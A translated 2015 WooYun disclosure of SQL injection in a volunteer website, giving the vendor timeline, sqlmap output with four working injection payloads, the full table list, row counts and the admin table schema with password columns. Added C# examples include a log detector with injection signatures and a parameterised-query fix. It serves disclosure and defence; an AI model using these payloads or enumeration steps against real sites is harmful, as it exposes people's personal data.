
Vulnerability summary

Defect ID: wooyun-2015-0149410

Title: SQL injection in a volunteer website leaks tens of thousands of volunteer records (name/school/photo/mobile number/birthday/address, etc.)

Vendor: a volunteer website

Author: 路人甲

Submitted: 2015-10-27 14:52

Fixed: 2015-12-14 17:50

Published: 2015-12-14 17:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-27: Details sent to the vendor; awaiting vendor handling
2015-10-30: Vendor confirmed; details disclosed to the vendor only
2015-11-09: Details disclosed to core white hats and domain experts
2015-11-19: Details disclosed to regular white hats
2015-11-29: Details disclosed to intern white hats
2015-12-14: Details disclosed to the public

Brief description:

As per the title.

Detailed description:

Link: http://**.**.**.**/volunteers/ShowPage.aspx?newsid=9938
SQL injection in a volunteer website leaks tens of thousands of volunteer records (name/school/photo/mobile number/birthday/address, etc.)
17,212 records in total, across 574 pages; currently on page 1, 30 records per page

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: newsid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsid=9938' AND 7081=7081 AND 'YNze'='YNze
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: newsid=-1077' UNION ALL SELECT CHAR(58) CHAR(115) CHAR(112) CHAR(9 ) CHAR(58) CHAR(67) CHAR(102) CHAR(68) CHAR(79) CHAR(109) CHAR(87) CHAR(70) CHAR(101) CHAR(77) CHAR(102) CHAR(58) CHAR(119) CHAR(112) CHAR(105) CHAR(58),NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: newsid=9938'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: newsid=9938' WAITFOR DELAY '0:0:5'--
---
[20:20:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
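The four injection techniques sqlmap reported above each leave a recognisable shape in the IIS access log. The following is an added example, not code from the report or the affected site: a small detector that scans IIS W3C log lines for those payload shapes in the newsid query string. The log lines are constructed, and the default IIS field order is assumed.

```csharp
// Added example, not from the report: flag IIS W3C log lines whose query string
// carries the payload shapes sqlmap reported above. The log lines are constructed.
using System;
using System.Collections.Generic;
using System.Text.RegularExpressions;

public static class NewsidInjectionDetector
{
    // Signatures matched against the URL-decoded cs-uri-query field, one per
    // technique in the sqlmap output (boolean-based, UNION, CHAR() strings, WAITFOR).
    static readonly Regex[] Signatures = {
        new Regex(@"'\s*AND\s+\d+\s*=\s*\d+", RegexOptions.IgnoreCase),
        new Regex(@"UNION\s+ALL\s+SELECT", RegexOptions.IgnoreCase),
        new Regex(@"(CHAR\(\d+\)[\s+]*){3,}", RegexOptions.IgnoreCase),
        new Regex(@"WAITFOR\s+DELAY", RegexOptions.IgnoreCase),
    };

    // Assumes the default IIS field order: date time s-ip cs-method cs-uri-stem cs-uri-query ...
    public static List<string> Scan(IEnumerable<string> lines)
    {
        List<string> hits = new List<string>();
        foreach (string line in lines)
        {
            if (line.StartsWith("#")) continue;            // header/directive lines
            string[] f = line.Split(' ');
            if (f.Length < 6 || f[5] == "-") continue;     // no query string
            string query = Uri.UnescapeDataString(f[5].Replace('+', ' '));
            foreach (Regex sig in Signatures)
            {
                if (sig.IsMatch(query)) { hits.Add(line); break; }
            }
        }
        return hits;
    }

    public static void Main()
    {
        string[] sample = {  // constructed lines; 203.0.113.7 is a documentation address
            "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
            "2015-10-27 12:20:20 10.0.0.5 GET /volunteers/ShowPage.aspx newsid=9938 80 - 203.0.113.7 Mozilla/5.0 200",
            "2015-10-27 12:20:21 10.0.0.5 GET /volunteers/ShowPage.aspx newsid=9938%27+AND+7081%3D7081+AND+%27YNze%27%3D%27YNze 80 - 203.0.113.7 sqlmap/1.0 200",
            "2015-10-27 12:20:25 10.0.0.5 GET /volunteers/ShowPage.aspx newsid=9938%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 203.0.113.7 sqlmap/1.0 500",
        };
        foreach (string hit in Scan(sample))
            Console.WriteLine("suspicious: " + hit);   // the two sqlmap lines are reported
    }
}
```

A time-based probe like the WAITFOR line also shows up as an unusually long time-taken value for a normally cheap page, which is worth alerting on independently of the signatures.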
[20:20:20] [INFO] fetching tables for database: hds0280121_db
available databases [3]:
[*] hds0280121_db
[*] master
[*] tempdb
current database: 'hds0280121_db'
Database: hds0280121_db
[103 tables]
+------------------------+
| Adminpictemp |
| Art_Example |
| Art_board |
| Art_class |
| Art_type |
| D99_CMD |
| D99_Tmp |
| Dv_Admin |
| Dv_BbsLink |
| Dv_Upfile |
| Event_Info |
| Event_Star |
| Jangli |
| Post |
| Userpictemp |
| VolunteerStar |
| Volunteers |
| ad_ads |
| ad_iplist |
| ad_weizhi |
| admin |
| article |
| clear |
| declare_unit |
| diaodong_info |
| dnt_admingroups |
| dnt_adminvisitlog |
| dnt_advertisements |
| dnt_announcements |
| dnt_attachments |
| dnt_attachpaymentlog |
| dnt_attachtypes |
| dnt_banned |
| dnt_bbcodes |
| dnt_bonuslog |
| dnt_creditslog |
| dnt_debatediggs |
| dnt_debates |
| dnt_failedlogins |
| dnt_favorites |
| dnt_forumfields |
| dnt_forumlinks |
| dnt_forums |
| dnt_help |
| dnt_invitation |
| dnt_locations |
| dnt_medals |
| dnt_medalslog |
| dnt_moderatormanagelog |
| dnt_moderators |
| dnt_myattachments |
| dnt_myposts |
| dnt_mytopics |
| dnt_navs |
| dnt_notices |
| dnt_online |
| dnt_onlinelist |
| dnt_onlinetime |
| dnt_orders |
| dnt_paymentlog |
| dnt_pms |
| dnt_polloptions |
| dnt_polls |
| dnt_postdebatefields |
| dnt_postid |
| dnt_posts1 |
| dnt_ratelog |
| dnt_scheduledevents |
| dnt_searchcaches |
| dnt_smilies |
| dnt_statistics |
| dnt_stats |
| dnt_statvars |
| dnt_tablelist |
| dnt_tags |
| dnt_templates |
| dnt_topicidentify |
| dnt_topics |
| dnt_topictagcaches |
| dnt_topictags |
| dnt_topictypes |
| dnt_trendstat |
| dnt_userfields |
| dnt_usergroups |
| dnt_users |
| dnt_words |
| event_images |
| event_top30 |
| extentinfo |
| faq |
| fire_unit |
| imgnclass |
| jubao |
| link |
| liuyan |
| requestService |
| review |
| smsSend |
| sms_recv |
| sms_send_permission |
| video |
| zhiwei |
| zy_unit |
+------------------------+

Proof of vulnerability:

Database: hds0280121_db
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| dbo.dnt_pms | 112717 |
| dbo.dnt_userfields | 75860 |
| dbo.dnt_users | 75856 |
| dbo.dnt_myposts | 61409 |
| dbo.dnt_mytopics | 41301 |
| dbo.dnt_posts1 | 22052 |
| dbo.Volunteers | 17212 |
| dbo.smsSend | 14729 |
| dbo.dnt_scheduledevents | 7168 |
| dbo.dnt_myattachments | 6477 |
| dbo.dnt_attachments | 6475 |
| dbo.Dv_Upfile | 6466 |
| dbo.Event_Info | 4916 |
| dbo.event_images | 4480 |
| dbo.article | 3779 |
| dbo.diaodong_info | 3332 |
| dbo.dnt_adminvisitlog | 2189 |
| dbo.dnt_topics | 1988 |
| dbo.dnt_onlinetime | 1914 |
| dbo.dnt_statvars | 1194 |
| dbo.dnt_trendstat | 947 |
| dbo.sms_recv | 848 |
| dbo.review | 685 |
| dbo.faq | 448 |
| dbo.dnt_moderatormanagelog | 199 |
| dbo.zy_unit | 116 |
| dbo.dnt_smilies | 88 |
| dbo.Art_class | 57 |
Database: hds0280121_db
Table: admin
[12 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| id | int |
| is_checkSmsSend | bit |
| name | nvarchar |
| phone | nvarchar |
| sign | smallint |
| type | bit |
| typeidlist | nvarchar |
| unit_id | int |
| userid | nvarchar |
| userpwd | nvarchar |
| zyunit_id | int |
| zyzhiweiID | int |
+-----------------+----------+
Database: hds0280121_db
Table: admin
[35 entries]
Fix:

Filter the input...
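"Filtering" is the weaker remedy here; the durable fix for an ASP.NET page backed by SQL Server is to treat newsid as an integer and bind it as a typed parameter. The following is an added example and not the affected site's code: a hardened ShowPage.aspx code-behind, with the vulnerable shape left as a comment. The table, column, control and connection-string names are assumptions.

```csharp
// Added example, not the affected site's code: a hardened ShowPage.aspx code-behind
// for ASP.NET 2.0 / SQL Server. Table, column and control names are assumptions.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;
using System.Web.UI;

public partial class ShowPage : Page   // TitleLabel/BodyLabel come from the .aspx markup
{
    // Vulnerable shape implied by the sqlmap output: the raw query-string value is
    // concatenated into the SQL text, so a single quote closes the literal and the
    // rest of the value is executed as SQL.
    //   string sql = "SELECT title, body FROM article WHERE newsid = '"
    //              + Request.QueryString["newsid"] + "'";

    protected void Page_Load(object sender, EventArgs e)
    {
        // 1. newsid is an integer key: parse it and refuse anything else before
        //    the database is touched. This alone defeats every payload above.
        int newsid;
        if (!int.TryParse(Request.QueryString["newsid"], out newsid) || newsid <= 0)
        {
            Response.StatusCode = 400;
            Response.End();
        }

        // 2. Bind the value as a typed parameter; it is sent as data, never as SQL text.
        //    The connection string should use a low-privilege, read-only login rather
        //    than sa, so a stacked query could not do more than this page's SELECT.
        const string sql = "SELECT title, body FROM article WHERE newsid = @newsid";
        string connStr = ConfigurationManager.ConnectionStrings["VolunteerDb"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(connStr))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@newsid", SqlDbType.Int).Value = newsid;
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                if (reader.Read())
                {
                    // 3. Encode on output so stored content cannot inject HTML either.
                    TitleLabel.Text = HttpUtility.HtmlEncode(reader.GetString(0));
                    BodyLabel.Text = HttpUtility.HtmlEncode(reader.GetString(1));
                }
            }
        }
    }
}
```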

Copyright notice: when reposting, please credit the source: 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-30 17:50

Vendor reply:

CNVD confirmed and reproduced the described vulnerability; it has been transferred to CNCERT, which will pass it to the corresponding branch centre to coordinate handling with the organisation that operates the website.

Latest status:

None yet